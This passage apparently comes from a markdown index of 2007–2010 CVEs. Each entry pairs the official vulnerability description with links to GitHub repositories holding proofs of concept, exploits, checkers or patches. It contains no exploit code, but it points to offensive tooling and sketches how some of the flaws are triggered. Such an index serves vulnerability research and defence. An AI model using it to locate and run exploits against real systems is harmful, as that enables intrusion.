elf/dl-load.c in ld.so in the GNU C Library (aka glibc or libc6) through 2.11.2, and 2.12.x through 2.12.1, does not properly handle a value of $ORIGIN for the LD_AUDIT environment variable, which allows local users to gain privileges via a crafted dynamic shared object (DSO) located in an arbitrary directory.
- [magisterquis/cve-2010-3847](https://github.com/magisterquis/cve-2010-3847)
### CVE-2010-3904 (2010-12-06)
The rds_page_copy_user function in net/rds/page.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel before 2.6.36 does not properly validate addresses obtained from user space, which allows local users to gain privileges via crafted use of the sendmsg and recvmsg system calls.
- [redhatkaty/-cve-2010-3904-report](https://github.com/redhatkaty/-cve-2010-3904-report)
### CVE-2010-3971 (2010-12-22)
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
- [nektra/CVE-2010-3971-hotpatch](https://github.com/nektra/CVE-2010-3971-hotpatch)
### CVE-2010-4221 (2010-11-09)
Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
- [M41doror/cve-2010-4221](https://github.com/M41doror/cve-2010-4221)
### CVE-2010-4231 (2010-11-16)
Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
- [K3ysTr0K3R/CVE-2010-4231-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT)
### CVE-2010-4476 (2011-02-17)
The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
- [grzegorzblaszczyk/CVE-2010-4476-check](https://github.com/grzegorzblaszczyk/CVE-2010-4476-check)
### CVE-2010-4669 (2011-01-07)
The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package.
- [wrong-commit/CVE-2010-4669](https://github.com/wrong-commit/CVE-2010-4669)
### CVE-2010-4804 (2011-06-09)
The Android browser in Android before 2.3.4 allows remote attackers to obtain SD card contents via crafted content:// URIs, related to (1) BrowserActivity.java and (2) BrowserSettings.java in com/android/browser/.
- [thomascannon/android-cve-2010-4804](https://github.com/thomascannon/android-cve-2010-4804)
### CVE-2010-5230 (2012-09-07)
Multiple untrusted search path vulnerabilities in MicroStation 7.1 allow local users to gain privileges via a Trojan horse (1) mptools.dll, (2) baseman.dll, (3) wintab32.dll, or (4) wintab.dll file in the current working directory, as demonstrated by a directory that contains a .hln or .rdl file. NOTE: some of these details are obtained from third party information.
- [otofoto/CVE-2010-5230](https://github.com/otofoto/CVE-2010-5230)
### CVE-2010-5301 (2014-06-13)
Stack-based buffer overflow in Kolibri 2.0 allows remote attackers to execute arbitrary code via a long URI in a HEAD request.
- [lem0nSec/CVE-2010-5301](https://github.com/lem0nSec/CVE-2010-5301)
## 2009
### CVE-2009-0182 (2009-01-20)
Buffer overflow in VUPlayer 2.49 and earlier allows user-assisted attackers to execute arbitrary code via a long URL in a File line in a .pls file, as demonstrated by an http URL on a File1 line.
- [nobodyatall648/CVE-2009-0182](https://github.com/nobodyatall648/CVE-2009-0182)
### CVE-2009-0229 (2009-06-10)
The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability."
- [zveriu/CVE-2009-0229-PoC](https://github.com/zveriu/CVE-2009-0229-PoC)
### CVE-2009-0347 (2009-01-29)
Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
- [Cappricio-Securities/CVE-2009-0347](https://github.com/Cappricio-Securities/CVE-2009-0347)
### CVE-2009-0473 (2009-02-06)
Open redirect vulnerability in the web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
- [akbarq/CVE-2009-0473-check](https://github.com/akbarq/CVE-2009-0473-check)
### CVE-2009-0689 (2009-07-01)
Array index error in the (1) dtoa implementation in dtoa.c (aka pdtoa.c) and the (2) gdtoa (aka new dtoa) implementation in gdtoa/misc.c in libc, as used in multiple operating systems and products including in FreeBSD 6.4 and 7.2, NetBSD 5.0, OpenBSD 4.5, Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4, K-Meleon 1.5.3, SeaMonkey 1.1.8, and other products, allows context-dependent attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a large precision value in the format argument to a printf function, which triggers incorrect memory allocation and a heap-based buffer overflow during conversion to a floating-point number.
- [Fullmetal5/str2hax](https://github.com/Fullmetal5/str2hax)
### CVE-2009-1151 (2009-03-26)
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
- [pagvac/pocs](https://github.com/pagvac/pocs)
- [e-Thug/PhpMyAdmin](https://github.com/e-Thug/PhpMyAdmin)
### CVE-2009-1244 (2009-04-13)
Unspecified vulnerability in the virtual machine display function in VMware Workstation 6.5.1 and earlier; VMware Player 2.5.1 and earlier; VMware ACE 2.5.1 and earlier; VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745; VMware Fusion before 2.0.4 build 159196; VMware ESXi 3.5; and VMware ESX 3.0.2, 3.0.3, and 3.5 allows guest OS users to execute arbitrary code on the host OS via unknown vectors, a different vulnerability than CVE-2008-4916.
- [piotrbania/vmware_exploit_pack_CVE-2009-1244](https://github.com/piotrbania/vmware_exploit_pack_CVE-2009-1244)
### CVE-2009-1324 (2009-04-17)
Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
- [war4uthor/CVE-2009-1324](https://github.com/war4uthor/CVE-2009-1324)
### CVE-2009-1330 (2009-04-17)
Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.
- [adenkiewicz/CVE-2009-1330](https://github.com/adenkiewicz/CVE-2009-1330)
- [war4uthor/CVE-2009-1330](https://github.com/war4uthor/CVE-2009-1330)
- [exploitwritter/CVE-2009-1330_EasyRMToMp3Converter](https://github.com/exploitwritter/CVE-2009-1330_EasyRMToMp3Converter)
### CVE-2009-1437 (2009-04-27)
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.
- [HanseSecure/CVE-2009-1437](https://github.com/HanseSecure/CVE-2009-1437)
### CVE-2009-1904 (2009-06-11)
The BigDecimal library in Ruby 1.8.6 before p369 and 1.8.7 before p173 allows context-dependent attackers to cause a denial of service (application crash) via a string argument that represents a large number, as demonstrated by an attempted conversion to the Float data type.
- [NZKoz/bigdecimal-segfault-fix](https://github.com/NZKoz/bigdecimal-segfault-fix)
### CVE-2009-2265 (2009-07-05)
Multiple directory traversal vulnerabilities in FCKeditor before 2.6.4.1 allow remote attackers to create executable files in arbitrary directories via directory traversal sequences in the input to unspecified connector modules, as exploited in the wild for remote code execution in July 2009, related to the file browser and the editor/filemanager/connectors/ directory.
- [zaphoxx/zaphoxx-coldfusion](https://github.com/zaphoxx/zaphoxx-coldfusion)
- [h3xcr4ck3r/CVE-2009-2265](https://github.com/h3xcr4ck3r/CVE-2009-2265)
- [p1ckzi/CVE-2009-2265](https://github.com/p1ckzi/CVE-2009-2265)
- [0xConstant/CVE-2009-2265](https://github.com/0xConstant/CVE-2009-2265)
### CVE-2009-2692 (2009-08-14)
The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.
- [jdvalentini/CVE-2009-2692](https://github.com/jdvalentini/CVE-2009-2692)
### CVE-2009-2698 (2009-08-27)
The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.
- [xiaoxiaoleo/CVE-2009-2698](https://github.com/xiaoxiaoleo/CVE-2009-2698)
### CVE-2009-3036 (2010-02-23)
Cross-site scripting (XSS) vulnerability in the console in Symantec IM Manager 8.3 and 8.4 before 8.4.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
- [brinhosa/CVE-2009-3036](https://github.com/brinhosa/CVE-2009-3036)
### CVE-2009-3103 (2009-09-08)
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
- [sooklalad/ms09050](https://github.com/sooklalad/ms09050)
- [sec13b/ms09-050_CVE-2009-3103](https://github.com/sec13b/ms09-050_CVE-2009-3103)
- [Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-](https://github.com/Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-)
### CVE-2009-3555 (2009-11-09)
The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
- [johnwchadwick/cve-2009-3555-test-server](https://github.com/johnwchadwick/cve-2009-3555-test-server)
### CVE-2009-4049 (2009-11-23)
Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024.
- [fengjixuchui/CVE-2009-4049](https://github.com/fengjixuchui/CVE-2009-4049)
### CVE-2009-4092 (2009-11-27)
Cross-site request forgery (CSRF) vulnerability in user.php in Simplog 0.9.3.2, and possibly earlier, allows remote attackers to hijack the authentication of administrators and users for requests that change passwords.
- [xiaoyu-iid/Simplog-Exploit](https://github.com/xiaoyu-iid/Simplog-Exploit)
### CVE-2009-4118 (2009-12-01)
The StartServiceCtrlDispatcher function in the cvpnd service (cvpnd.exe) in Cisco VPN client for Windows before 5.0.06.0100 does not properly handle an ERROR_FAILED_SERVICE_CONTROLLER_CONNECT error, which allows local users to cause a denial of service (service crash and VPN connection loss) via a manual start of cvpnd.exe while the cvpnd service is running.
- [alt3kx/CVE-2009-4118](https://github.com/alt3kx/CVE-2009-4118)
### CVE-2009-4137 (2009-12-24)
The loadContentFromCookie function in core/Cookie.php in Piwik before 0.5 does not validate strings obtained from cookies before calling the unserialize function, which allows remote attackers to execute arbitrary code or upload arbitrary files via vectors related to the __destruct function in the Piwik_Config class; php://filter URIs; the __destruct functions in Zend Framework, as demonstrated by the Zend_Log destructor; the shutdown functions in Zend Framework, as demonstrated by the Zend_Log_Writer_Mail class; the render function in the Piwik_View class; Smarty templates; and the _eval function in Smarty.
- [Alexeyan/CVE-2009-4137](https://github.com/Alexeyan/CVE-2009-4137)
### CVE-2009-4623 (2010-01-18)
Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) index.php and (2) admin.php in advanced_comment_system/. NOTE: this might only be a vulnerability when the administrator has not followed installation instructions in install.php. NOTE: this might be the same as CVE-2020-35598.
- [hupe1980/CVE-2009-4623](https://github.com/hupe1980/CVE-2009-4623)
- [kernel-cyber/CVE-2009-4623](https://github.com/kernel-cyber/CVE-2009-4623)
- [MonsempesSamuel/CVE-2009-4623](https://github.com/MonsempesSamuel/CVE-2009-4623)
### CVE-2009-4660 (2010-03-03)
Stack-based buffer overflow in the AntServer Module (AntServer.exe) in BigAnt IM Server 2.50 allows remote attackers to execute arbitrary code via a long GET request to TCP port 6660.
- [war4uthor/CVE-2009-4660](https://github.com/war4uthor/CVE-2009-4660)
### CVE-2009-5147 (2017-03-29)
DL::dlopen in Ruby 1.8, 1.9.0, 1.9.2, 1.9.3, 2.0.0 before patchlevel 648, and 2.1 before 2.1.8 opens libraries with tainted names.
- [vpereira/CVE-2009-5147](https://github.com/vpereira/CVE-2009-5147)
- [zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-](https://github.com/zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-)
## 2008
### CVE-2008-0128 (2008-01-23)
The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
- [ngyanch/4062-1](https://github.com/ngyanch/4062-1)
### CVE-2008-0166 (2008-05-13)
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
- [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
- [avarx/vulnkeys](https://github.com/avarx/vulnkeys)
- [badkeys/debianopenssl](https://github.com/badkeys/debianopenssl)
- [demining/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166](https://github.com/demining/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166)
### CVE-2008-0228 (2008-01-10)
Cross-site request forgery (CSRF) vulnerability in apply.cgi in the Linksys WRT54GL Wireless-G Broadband Router with firmware 4.30.9 allows remote attackers to perform actions as administrators.
- [SpiderLabs/TWSL2011-007_iOS_code_workaround](https://github.com/SpiderLabs/TWSL2011-007_iOS_code_workaround)
### CVE-2008-1611 (2008-04-01)
Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request.
- [Axua/CVE-2008-1611](https://github.com/Axua/CVE-2008-1611)
### CVE-2008-1613 (2008-04-21)
SQL injection vulnerability in ioRD.asp in RedDot CMS 7.5 Build 7.5.0.48, and possibly other versions including 6.5 and 7.0, allows remote attackers to execute arbitrary SQL commands via the LngId parameter.
- [SECFORCE/CVE-2008-1613](https://github.com/SECFORCE/CVE-2008-1613)
### CVE-2008-2019 (2008-04-30)
Simple Machines Forum (SMF), probably 1.1.4, relies on "randomly generated static" to hinder brute-force attacks on the WAV file (aka audio) CAPTCHA, which allows remote attackers to pass the CAPTCHA test via an automated attack that considers Hamming distances. NOTE: this issue reportedly exists because of an insufficient fix for CVE-2007-3308.
- [TheRook/AudioCaptchaBypass-CVE-2008-2019](https://github.com/TheRook/AudioCaptchaBypass-CVE-2008-2019)
### CVE-2008-2938 (2008-08-13)
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
- [Naramsim/Offensive](https://github.com/Naramsim/Offensive)
### CVE-2008-3531 (2008-09-05)
Stack-based buffer overflow in sys/kern/vfs_mount.c in the kernel in FreeBSD 7.0 and 7.1, when vfs.usermount is enabled, allows local users to gain privileges via a crafted (1) mount or (2) nmount system call, related to copying of "user defined data" in "certain error conditions."
- [test-one9/ps4-11.50.github.io](https://github.com/test-one9/ps4-11.50.github.io)
### CVE-2008-4109 (2008-09-17)
A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch; before 4.6p1-1 on sid and lenny; and on other distributions such as SUSE uses functions that are not async-signal-safe in the signal handler for login timeouts, which allows remote attackers to cause a denial of service (connection slot exhaustion) via multiple login attempts. NOTE: this issue exists because of an incorrect fix for CVE-2006-5051.
- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387)
### CVE-2008-4250 (2008-10-23)
The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability."
- [thunderstrike9090/Conflicker_analysis_scripts](https://github.com/thunderstrike9090/Conflicker_analysis_scripts)
### CVE-2008-4609 (2008-10-20)
The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress.
- [mrclki/sockstress](https://github.com/mrclki/sockstress)
### CVE-2008-4654 (2008-10-21)
Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.
- [bongbongco/CVE-2008-4654](https://github.com/bongbongco/CVE-2008-4654)
- [KernelErr/VLC-CVE-2008-4654-Exploit](https://github.com/KernelErr/VLC-CVE-2008-4654-Exploit)
- [rnnsz/CVE-2008-4654](https://github.com/rnnsz/CVE-2008-4654)
### CVE-2008-4687 (2008-10-22)
manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to execute arbitrary code via a sort parameter containing PHP sequences, which are processed by create_function within the multi_sort function in core/utility_api.php.
- [nmurilo/CVE-2008-4687-exploit](https://github.com/nmurilo/CVE-2008-4687-exploit)
- [twisted007/mantis_rce](https://github.com/twisted007/mantis_rce)
### CVE-2008-5416 (2008-12-10)
Heap-based buffer overflow in Microsoft SQL Server 2000 SP4, 8.00.2050, 8.00.2039, and earlier; SQL Server 2000 Desktop Engine (MSDE 2000) SP4; SQL Server 2005 SP2 and 9.00.1399.06; SQL Server 2000 Desktop Engine (WMSDE) on Windows Server 2003 SP1 and SP2; and Windows Internal Database (WYukon) SP2 allows remote authenticated users to cause a denial of service (access violation exception) or execute arbitrary code by calling the sp_replwritetovarbin extended stored procedure with a set of invalid parameters that trigger memory overwrite, aka "SQL Server sp_replwritetovarbin Limited Memory Overwrite Vulnerability."
- [SECFORCE/CVE-2008-5416](https://github.com/SECFORCE/CVE-2008-5416)
### CVE-2008-5862 (2009-01-06)
Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410 build 2132 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the URI.
- [K3ysTr0K3R/CVE-2008-5862-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2008-5862-EXPLOIT)
### CVE-2008-6806 (2009-05-12)
Unrestricted file upload vulnerability in includes/imageupload.php in 7Shop 1.1 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in images/artikel/.
- [threatcode/CVE-2008-6806](https://github.com/threatcode/CVE-2008-6806)
### CVE-2008-6827 (2009-06-08)
The ListView control in the Client GUI (AClient.exe) in Symantec Altiris Deployment Solution 6.x before 6.9.355 SP1 allows local users to gain SYSTEM privileges and execute arbitrary commands via a "Shatter" style attack on the "command prompt" hidden GUI button to (1) overwrite the CommandLine parameter to cmd.exe to use SYSTEM privileges and (2) modify the DLL that is loaded using the LoadLibrary API function.
- [alt3kx/CVE-2008-6827](https://github.com/alt3kx/CVE-2008-6827)
### CVE-2008-6970 (2009-08-13)
SQL injection vulnerability in dosearch.inc.php in UBB.threads 7.3.1 and earlier allows remote attackers to execute arbitrary SQL commands via the Forum[] array parameter.
- [KyomaHooin/CVE-2008-6970](https://github.com/KyomaHooin/CVE-2008-6970)
### CVE-2008-7220 (2009-09-13)
Unspecified vulnerability in Prototype JavaScript framework (prototypejs) before 1.6.0.2 allows attackers to make "cross-site ajax requests" via unknown vectors.
- [followboy1999/CVE-2008-7220](https://github.com/followboy1999/CVE-2008-7220)
## 2007
### CVE-2007-0038 (2007-03-30)
Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765; if so, then CVE-2007-0038 should be preferred.
- [Axua/CVE-2007-0038](https://github.com/Axua/CVE-2007-0038)
### CVE-2007-0843 (2007-02-23)
The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information.
- [z3APA3A/spydir](https://github.com/z3APA3A/spydir)
### CVE-2007-1567 (2007-03-21)
Stack-based buffer overflow in War FTP Daemon 1.65, and possibly earlier, allows remote attackers to cause a denial of service or execute arbitrary code via unspecified vectors, as demonstrated by warftp_165.tar by Immunity. NOTE: this might be the same issue as CVE-1999-0256, CVE-2000-0131, or CVE-2006-2171, but due to Immunity's lack of details, this cannot be certain.
- [war4uthor/CVE-2007-1567](https://github.com/war4uthor/CVE-2007-1567)
### CVE-2007-1858 (2007-05-09)
The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)
### CVE-2007-2447 (2007-05-14)
The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
- [amriunix/CVE-2007-2447](https://github.com/amriunix/CVE-2007-2447)
- [Unix13/metasploitable2](https://github.com/Unix13/metasploitable2)
- [b1fair/smb_usermap](https://github.com/b1fair/smb_usermap)
- [JoseBarrios/CVE-2007-2447](https://github.com/JoseBarrios/CVE-2007-2447)
- [3x1t1um/CVE-2007-2447](https://github.com/3x1t1um/CVE-2007-2447)
- [xlcc4096/exploit-CVE-2007-2447](https://github.com/xlcc4096/exploit-CVE-2007-2447)
- [WildfootW/CVE-2007-2447_Samba_3.0.25rc3](https://github.com/WildfootW/CVE-2007-2447_Samba_3.0.25rc3)
- [Ziemni/CVE-2007-2447-in-Python](https://github.com/Ziemni/CVE-2007-2447-in-Python)
- [0xKn/CVE-2007-2447](https://github.com/0xKn/CVE-2007-2447)
- [ozuma/CVE-2007-2447](https://github.com/ozuma/CVE-2007-2447)
- [un4gi/CVE-2007-2447](https://github.com/un4gi/CVE-2007-2447)
- [G01d3nW01f/CVE-2007-2447](https://github.com/G01d3nW01f/CVE-2007-2447)
- [cherrera0001/CVE-2007-2447](https://github.com/cherrera0001/CVE-2007-2447)
- [Alien0ne/CVE-2007-2447](https://github.com/Alien0ne/CVE-2007-2447)
- [3t4n/samba-3.0.24-CVE-2007-2447-vunerable-](https://github.com/3t4n/samba-3.0.24-CVE-2007-2447-vunerable-)
- [xbufu/CVE-2007-2447](https://github.com/xbufu/CVE-2007-2447)
- [s4msec/CVE-2007-2447](https://github.com/s4msec/CVE-2007-2447)
- [0xConstant/CVE-2007-2447](https://github.com/0xConstant/CVE-2007-2447)
- [Nosferatuvjr/Samba-Usermap-exploit](https://github.com/Nosferatuvjr/Samba-Usermap-exploit)
- [testaross4/CVE-2007-2447](https://github.com/testaross4/CVE-2007-2447)
- [mr-l0n3lly/CVE-2007-2447](https://github.com/mr-l0n3lly/CVE-2007-2447)
- [HerculesRD/PyUsernameMapScriptRCE](https://github.com/HerculesRD/PyUsernameMapScriptRCE)
- [Aviksaikat/CVE-2007-2447](https://github.com/Aviksaikat/CVE-2007-2447)
- [h3xcr4ck3r/CVE-2007-2447](https://github.com/h3xcr4ck3r/CVE-2007-2447)
- [bdunlap9/CVE-2007-2447_python](https://github.com/bdunlap9/CVE-2007-2447_python)
- [MikeRega7/CVE-2007-2447-RCE](https://github.com/MikeRega7/CVE-2007-2447-RCE)
- [0xTabun/CVE-2007-2447](https://github.com/0xTabun/CVE-2007-2447)
- [ShivamDey/Samba-CVE-2007-2447-Exploit](https://github.com/ShivamDey/Samba-CVE-2007-2447-Exploit)
- [Juantos/cve-2007-2447](https://github.com/Juantos/cve-2007-2447)
- [IamLucif3r/CVE-2007-2447-Exploit](https://github.com/IamLucif3r/CVE-2007-2447-Exploit)
### CVE-2007-3280 (2007-06-19)
The Database Link library (dblink) in PostgreSQL 8.1 implements functions via CREATE statements that map to arbitrary libraries based on the C programming language, which allows remote authenticated superusers to map and execute a function from any library, as demonstrated by using the system function in libc.so.6 to gain shell access.
- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports)
### CVE-2007-3830 (2007-07-17)
Cross-site scripting (XSS) vulnerability in alert.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 allows remote attackers to inject arbitrary web script or HTML via the reminder parameter.
- [alt3kx/CVE-2007-3830](https://github.com/alt3kx/CVE-2007-3830)
### CVE-2007-3831 (2007-07-17)
PHP remote file inclusion in main.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.
- [alt3kx/CVE-2007-3831](https://github.com/alt3kx/CVE-2007-3831)
### CVE-2007-4559 (2007-08-28)
Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.
- [advanced-threat-research/Creosote](https://github.com/advanced-threat-research/Creosote)
- [Ooscaar/MALW](https://github.com/Ooscaar/MALW)
- [davidholiday/CVE-2007-4559](https://github.com/davidholiday/CVE-2007-4559)
- [luigigubello/trellix-tarslip-patch-bypass](https://github.com/luigigubello/trellix-tarslip-patch-bypass)
- [JamesDarf/tarpioka](https://github.com/JamesDarf/tarpioka)
### CVE-2007-4560 (2007-08-28)
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
- [0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution](https://github.com/0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution)
### CVE-2007-4607 (2007-08-31)
Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the SubmitToExpress method, a different vulnerability than CVE-2007-1029. NOTE: this may have been fixed in version 6.0.3.15.
- [joeyrideout/CVE-2007-4607](https://github.com/joeyrideout/CVE-2007-4607)
### CVE-2007-5036 (2007-09-24)
Multiple buffer overflows in the AirDefense Airsensor M520 with firmware 4.3.1.1 and 4.4.1.4 allow remote authenticated users to cause a denial of service (HTTPS service outage) via a crafted query string in an HTTPS request to (1) adLog.cgi, (2) post.cgi, or (3) ad.cgi, related to the "files filter."
- [alt3kx/CVE-2007-5036](https://github.com/alt3kx/CVE-2007-5036)
### CVE-2007-5962 (2008-05-22)
Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.
- [antogit-sys/CVE-2007-5962](https://github.com/antogit-sys/CVE-2007-5962)
### CVE-2007-6377 (2007-12-15)
Stack-based buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier allows remote attackers to execute arbitrary code via a long query string.
